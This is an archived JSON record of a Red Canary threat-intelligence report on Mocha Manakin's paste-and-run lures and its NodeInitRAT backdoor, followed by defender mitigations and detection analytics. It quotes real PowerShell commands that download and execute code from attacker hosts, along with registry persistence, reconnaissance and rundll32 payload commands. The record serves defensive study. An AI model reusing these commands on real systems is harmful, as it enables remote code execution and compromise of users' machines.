{
	"id": "f7869a6a-5c45-48ea-83a9-870beaafbe3e",
	"created_at": "2026-04-06T00:08:29.285431Z",
	"updated_at": "2026-04-10T03:36:18.963581Z",
	"deleted_at": null,
	"sha1_hash": "8228bb6af437f81c8240f10bee7bd5be550f1329",
	"title": "Mocha Manakin delivers custom NodeJS backdoor via paste and run | Red Canary",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 107381,
	"plain_text": "Mocha Manakin delivers custom NodeJS backdoor via paste and\r\nrun | Red Canary\r\nBy chris.brook@redcanary.com\r\nArchived: 2026-04-05 18:53:18 UTC\r\nMocha Manakin delivers custom NodeJS backdoor via paste and run\r\nThe newest Red Canary color bird threat employs paste and run with PowerShell to drop a custom NodeJS\r\nbackdoor that could lead to ransomware\r\nOriginally published June 18, 2025. Last modified July 15, 2025.\r\nWhat is Mocha Manakin?\r\nWe started tracking Mocha Manakin activity in January 2025, one of several activity clusters we’ve observed\r\nleveraging paste and run as the initial access technique. Paste and run (aka Clickfix, fakeCAPTCHA) is an initial\r\naccess technique that tricks users into executing a script that downloads follow-on payloads from adversary\r\ninfrastructure. We’ve observed a number of payloads delivered following successful paste and run execution,\r\nincluding LummaC2, HijackLoader, Vidar, and more.\r\nMocha Manakin is distinct from other paste and run activity because it is followed by a bespoke NodeJS-based\r\nbackdoor that we have named NodeInitRAT. NodeInitRAT allows the adversary to establish persistence and\r\nperform reconnaissance activities, such as enumerating principal names and gathering domain details.\r\nNodeInitRAT communicates with adversary-controlled servers over HTTP, often through Cloudflare tunnels\r\nhttps://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/\r\nPage 1 of 8\n\nacting as intermediary infrastructure. The backdoor is capable of issuing arbitrary commands and deploying\r\nadditional payloads on compromised systems.\r\nMocha Manakin has overlaps in activity related to Interlock ransomware, as reported by Sekoia.io. 
Specifically:\r\nthe use of paste and run for initial access\r\nfollow-on delivery of the NodeJS remote access trojan we call NodeInitRAT\r\nsome of the same infrastructure\r\nAs of May 2025, Red Canary has not directly observed Mocha Manakin activity progress to ransomware.\r\nHowever, we assess with moderate confidence that unmitigated Mocha Manakin activity will likely lead to\r\nransomware.\r\nMocha Manakin TTPs\r\nInitial access: Paste and run\r\nMocha Manakin gains initial access by using paste and run. Since we started tracking it in August 2024, paste and\r\nrun remains a popular method of initial execution and has increased in scope and scale. The increased use of paste\r\nand run is due to its ongoing effectiveness; paste-and-run lures are highly effective at tricking users into executing\r\nmalicious scripts on their endpoints. There are many ways to distribute paste-and-run lures, from phishing to web\r\nbrowser injects, meaning there are many opportunities for adversaries to present lures to users.\r\nThere are two main styles of paste-and-run lures:\r\nThe user has to “fix” their access to a document, website, or software installation/update by following the\r\ninstructions in the paste and run lure.\r\nA CAPTCHA-style lure prompting the user to follow given instructions to prove they are a human, also to\r\ngain access to a document, website, or installation/update process.\r\nOnce the users interact with the Fix or Verify button in the lure, the button will covertly copy an obfuscated\r\nPowerShell command to the clipboard and present the user with “verification steps,” which typically consist of\r\nrunning a shortcut to open the run dialog, pasting the copied PowerShell command, and pushing enter. 
By\r\nfollowing the “verification steps,” the user inadvertently runs the command.\r\nMocha Manakin’s paste-and-run commands have gone through several iterations, for example:\r\nDate seen Command\r\nDate seen:\r\nJanuary 2025\r\nCommand:\r\npowershell -NoProfile -Command \"$r=iwr 'hxxps://pub-motorola-viking-charger[.]trycloudflare[.]com/12341234'-UseBasicParsing;$s=[Text.Encoding]::UTF8.GetString($r.Content);iex $s\"\r\nDate seen:\r\nJanuary \u0026 February 2025\r\nCommand:\r\npowershell -noprofile -w H -c \"$r=iwr hxxps://pilot-agent-false-taken[.]trycloudflare[.]com/cloudfla -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s\"\r\nDate seen:\r\nApril 2025\r\nCommand:\r\n\"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -w h -c \"iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))\"\r\nThese commands will reach out to the adversary command and control and download malware or tools—in\r\nMocha Manakin’s case, NodeInitRAT.\r\nPayload: NodeInitRAT\r\nWhen successfully executed, Mocha Manakin’s paste-and-run PowerShell command will reach out to the URL in\r\nthe command line and execute a PowerShell loader. The PowerShell loader downloads a .zip file containing a\r\nlegitimate portable node.exe binary. 
It extracts the ZIP archive and executes NodeInitRAT by running\r\nnode.exe with the contents of NodeInitRAT passed via the command line.\r\nFigure: NodeInitRAT in node.exe command line\r\nOnce NodeInitRAT is installed on a system, it can go on to perform a number of actions:\r\nEstablish persistence using a Windows Registry run key\r\nPerform system and domain reconnaissance\r\nCommunicate with adversary-controlled servers over HTTP, commonly using Cloudflare tunnels as\r\nintermediary infrastructure; the communications occur via HTTP POST requests to the remote host with a\r\nURL path ending in /init1234.\r\nIssue arbitrary commands:\r\nWe observed commands to execute nltest, net.exe, and setspn.exe to gather lists of domain\r\ncontrollers \u0026 domain trusts, enumerate domain admin accounts, and enumerate Service Principal\r\nNames respectively\r\nDeploy EXE, DLL, and JS payloads on affected systems\r\nUse XOR encoding and GZIP compression to minimize data transferred and protect it from cursory\r\ninspection\r\nSimilar activity has also been observed by other researchers.\r\nThe following table displays some NodeInitRAT commands and what they do:\r\nNodeInitRAT command Description of activity\r\nNodeInitRAT command:\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"ChromeUpdater\" /t REG_SZ /d \"C:\\users[redacted]\\AppData\\Roaming\\node-v22.11.0-win-x64\\node.exe C:\\users[redacted]\\AppData\\Roaming\\node-v22.11.0-win-x64\\2fbjs1z6.log\" /f\"\r\nDescription of activity:\r\nEstablish persistence using a Windows Registry run key. 
As of\r\nApril 2025, the run key is usually named “ChromeUpdater”.\r\nNodeInitRAT command:\r\nsysinfo\r\nDescription of activity:\r\nDiscover the affected system’s system information\r\nNodeInitRAT command:\r\narp.exe -a\r\nDescription of activity:\r\nDiscover the affected system’s local network neighbors using\r\nARP\r\nNodeInitRAT command:\r\ntasklist.exe /svc\r\nDescription of activity:\r\nDiscover the affected system’s currently executing processes and\r\nany services\r\nNodeInitRAT command:\r\npowershell.exe -c Get-Service\r\nDescription of activity:\r\nDiscover the affected system’s services\r\nNodeInitRAT command:\r\npowershell.exe -c \"chcp 65001 \u003e $null 2\u003e\u00261 ; echo 'version: 000010' ; if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { 'Runas: System' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'Runas: Admin' } else { 'Runas: User' } ; systeminfo ; echo '=-=-=-=-=-' ; tasklist /svc ; echo '=-=-=-=-=-' ; Get-Service | Select-Object -Property Name, DisplayName | Format-List ; echo '=-=-=-=-=-' ; Get-PSDrive -PSProvider FileSystem | Format-Table ; echo '=-=-=-=-=-' ; arp -a\"\r\nDescription of activity:\r\nDiscover the current user’s level of privilege using PowerShell\r\nNodeInitRAT command:\r\ncmd.exe /d /s /c \"net user %USERNAME% /domain\"\r\nDescription of activity:\r\nExecute arbitrary commands using cmd.exe\r\nNodeInitRAT command:\r\nC:\\Users\\[redacted]\\AppData\\Roaming\\[a-z0-9]{8}.log\r\nNote: extension will vary by file type\r\nDescription of activity:\r\nDownload and execute arbitrary EXE, DLL, CMD, and JS files.\r\nIn some cases, the JS files may be renamed with 
.LOG\r\nextensions\r\nNodeInitRAT command:\r\nrundll32.exe C:\\Users\\[redacted]\\AppData\\Roaming\\[a-z0-9]{8}.dll,start\r\nDescription of activity:\r\nDeploy subsequent payloads in DLL form and execute the DLLs\r\nusing rundll32.exe\r\nTakeaways for defenders\r\nSince Mocha Manakin and NodeInitRAT have overlaps with Interlock-ransomware-related activity, it is important\r\nto detect and remediate this threat as early as possible.\r\nIts use of paste and run is both a boon and a challenge to defenders; a boon because it is a well-known and\r\nestablished technique, and a challenge since it is hard to mitigate. One mitigation strategy for the Windows variant\r\nis implementing a GPO disabling Windows hotkeys, preventing paste and run’s use of Windows+R or\r\nWindows+X, but as this is a popular feature with users, it does not seem to have been widely adopted by\r\nenterprises. Another mitigation strategy is employee education to alert users to adversaries’ strategies that take\r\nadvantage of their digital conditioning.\r\nTo mitigate NodeInitRAT, stop any relevant node.exe processes that are executing the malware. The RAT code\r\nitself is passed into node.exe via the command line, but a persistent copy of the code may exist in files matching\r\nthe path pattern \\AppData\\Roaming\\[a-z0-9]{8}.log. Deleting the persistent files and any Windows Registry run\r\nkeys should stop persistent execution. In the event that NodeInitRAT also drops additional files such as DLLs, we\r\nalso recommend removing those from disk.\r\nIf you discover an instance of NodeInitRAT, you can also take steps to block network communications. Any\r\ndomains found in NodeInitRAT command lines can be sinkholed to prevent communication, and any IPs\r\nreferenced in the command lines can be added to firewall rules to block communication. 
In many cases of\r\nNodeInitRAT, we observed command and control domains using trycloudflare[.]com, a URL that’s part of the\r\nlegitimate Cloudflare tunnel service. Hunting for these domains across network traffic and DNS requests may\r\nyield NodeInitRAT and other malware families.\r\nDetection opportunity: PowerShell using invoke-expression and invoke-restmethod to\r\ndownload content at a remote IP address\r\nThe following pseudo-detection analytic identifies instances of PowerShell using invoke-expression and\r\ninvoke-restmethod to download content at a remote IP address. Adversaries can use these cmdlets to download\r\nremotely hosted scripts, as seen in some versions of Mocha Manakin’s paste and run commands. Note that some\r\nutilities like chocolatey or chef use these functions legitimately.\r\nprocess == ('powershell')\r\n\u0026\u0026\r\ndeobfuscated_command_includes ('irm' || 'invoke-restmethod')\r\n\u0026\u0026\r\ndeobfuscated_command_includes ('iex' || 'invoke-expression')\r\n\u0026\u0026\r\ndeobfuscated_command_includes (IP address)\r\n\u0026\u0026\r\ndeobfuscated_command_excludes (approved IP address)\r\nDetection opportunity: Instances of NodeJS spawning the Command Processor to add a registry\r\nkey\r\nThe following pseudo-detection analytic identifies instances of NodeJS, node.exe, spawning the Command\r\nProcessor, cmd.exe, to add a registry key. NodeJS-based remote access trojans (RATs), including NodeInitRAT,\r\ncan use Windows Registry keys to establish persistence on a system. 
While normal behavior for node.exe\r\nincludes spawning instances of cmd.exe, creating registry run keys with those instances is not.\r\nparent_process == ('node.exe')\r\n\u0026\u0026\r\nprocess == ('cmd')\r\n\u0026\u0026\r\ndeobfuscated_command_includes ('reg add' || 'run')\r\nSource: https://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/"
	],
	"report_names": [
		"mocha-manakin-nodejs-backdoor"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "210b80c4-7d21-49a2-b199-b7c3c75dfb1c",
			"created_at": "2026-02-03T02:00:03.440751Z",
			"updated_at": "2026-04-10T02:00:03.940412Z",
			"deleted_at": null,
			"main_name": "Mocha Manakin",
			"aliases": [],
			"source_name": "MISPGALAXY:Mocha Manakin",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434109,
	"ts_updated_at": 1775792178,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8228bb6af437f81c8240f10bee7bd5be550f1329.pdf",
		"text": "https://archive.orkl.eu/8228bb6af437f81c8240f10bee7bd5be550f1329.txt",
		"img": "https://archive.orkl.eu/8228bb6af437f81c8240f10bee7bd5be550f1329.jpg"
	}
}